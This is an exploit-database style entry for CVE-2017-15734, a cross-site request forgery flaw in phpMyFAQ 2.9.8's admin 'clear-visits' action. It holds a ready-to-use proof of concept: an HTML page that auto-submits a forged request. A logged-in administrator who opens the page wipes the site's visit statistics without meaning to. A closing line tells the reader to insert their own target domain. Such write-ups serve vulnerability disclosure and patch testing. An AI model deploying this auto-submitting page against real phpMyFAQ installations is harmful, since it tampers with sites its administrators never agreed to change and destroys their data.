# Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF) 
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15734

PoC: 
Get http://phpmyfaq/admin/index.php?action=clear-visits
Reproduction: While still logged in, open another browser window to access the link.

Some Details:
{
    "Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
    "File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
    "Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
    "Request Parameters": "action=clear-visits",
    "Request Method": "GET",
    "Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
    "Final PoC": "<html>\n  <body>\n    <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n      <input type=\"submit\" value=\"Submit request\">\n    </form>\n    <script>\n      document.forms[0].submit();\n    </script>\n  </body>\n</html>"
}


[Replace Your Domain Name]